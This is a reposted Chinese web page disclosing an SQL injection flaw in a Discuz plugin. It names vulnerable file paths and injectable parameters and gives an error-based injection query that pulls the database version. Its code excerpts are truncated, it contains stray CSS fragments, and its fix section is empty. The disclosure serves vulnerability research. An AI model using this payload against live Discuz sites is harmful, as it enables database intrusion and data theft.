最新下载
热门教程
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
Discuz某插件sql注射漏洞
时间:2014-03-25 编辑:简简单单 来源:一聚教程网
Author:Saline
Email:Nophacker@gmail.com
文件source/plugin/aljhd/aljhd.inc.php122行附近
代码如下 | 复制代码 |
}else{ |
然后其中的fetch_all_by_ym fetch_all_by_type fetch_all_by_ym_type_status count_by_ym_type_status几个函数在
文件source/plugin/aljhd/table/table_alj_hd.php中找到了
代码如下 | 复制代码 |
class table_alj_hd extends discuz_table |
发现对其中的ym仅仅是做了addslashes处理,我们知道的addslashes编码仅仅是在gbk下才有作用,所有整个显得鸡肋
代码如下 | 复制代码 |
select count(*) from alj_hd where 1 and ym=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) and type=1 |
测试
word-spacing: 0px; -webkit-text-size-adjust: auto; -webkit-text-stroke-">可注入参数imes,ljtype,m,orderby,page,telid
贴一个ljtype的
随便找一个
POST测试一下
修复方案:
=-=~好多站都关了这个插件。。。
-
下一个: jQuery事件命名空间的深入分析
相关文章
- HTML简单购物数量小程序代码展示 10-31
- html canvas实现弹幕功能 10-31
- HTML中空格表示的意义 10-31
- html area标签解读 10-31
- html使用表单标签实现注册页面代码展示 10-31
- 使用HTML截图并保存为本地图片的代码展示 10-31